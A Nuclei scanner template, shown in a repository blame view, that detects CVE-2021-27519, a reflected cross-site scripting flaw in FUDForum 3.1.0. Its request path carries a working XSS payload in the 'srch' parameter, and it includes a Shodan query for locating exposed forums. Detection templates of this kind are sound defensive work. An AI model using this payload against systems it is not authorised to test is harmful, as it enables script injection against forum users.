nuclei-templates/http/cves/2021/CVE-2021-27519.yaml

54 lines
1.7 KiB
YAML
Raw Normal View History

2022-05-31 09:16:01 +00:00
id: CVE-2021-27519
info:
name: FUDForum 3.1.0 - Cross-Site Scripting
2022-06-01 10:30:27 +00:00
author: kh4sh3i
2022-05-31 09:16:01 +00:00
severity: medium
2022-06-01 10:30:27 +00:00
description: |
FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.
2022-06-01 10:46:23 +00:00
reference:
2022-06-01 10:30:27 +00:00
- https://www.exploit-db.com/exploits/49942
- https://github.com/fudforum/FUDforum/issues/2
- http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27519
2022-06-01 10:30:27 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-27519
cwe-id: CWE-79
epss-score: 0.00189
epss-percentile: 0.56251
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
2022-06-01 10:30:27 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: fudforum
product: fudforum
2023-09-06 12:09:01 +00:00
shodan-query: 'http.html:"Powered by: FUDforum"'
tags: xss,fudforum,edb,packetstorm,cve,cve2021
2022-05-31 09:16:01 +00:00
http:
2022-05-31 09:16:01 +00:00
- method: GET
path:
- '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0'
2022-06-01 13:38:57 +00:00
2022-05-31 09:16:01 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-06-01 13:33:12 +00:00
- 'highlightSearchTerms("x" onmouseover=alert(1) x="");'
2022-06-01 10:46:23 +00:00
2022-05-31 09:16:01 +00:00
- type: word
part: header
words:
2022-06-01 13:33:12 +00:00
- text/html
2022-05-31 09:16:01 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100b7d7eac1749f29ad784c0401ad9ff80c69be90f9ba12ce7db4d0171310021cab022100e2c4e36b208512e97fd9e0a3b84873be0626b48c65b5cef656456e387a9c5c7b:922c64590222798bb761d5b6d8e72950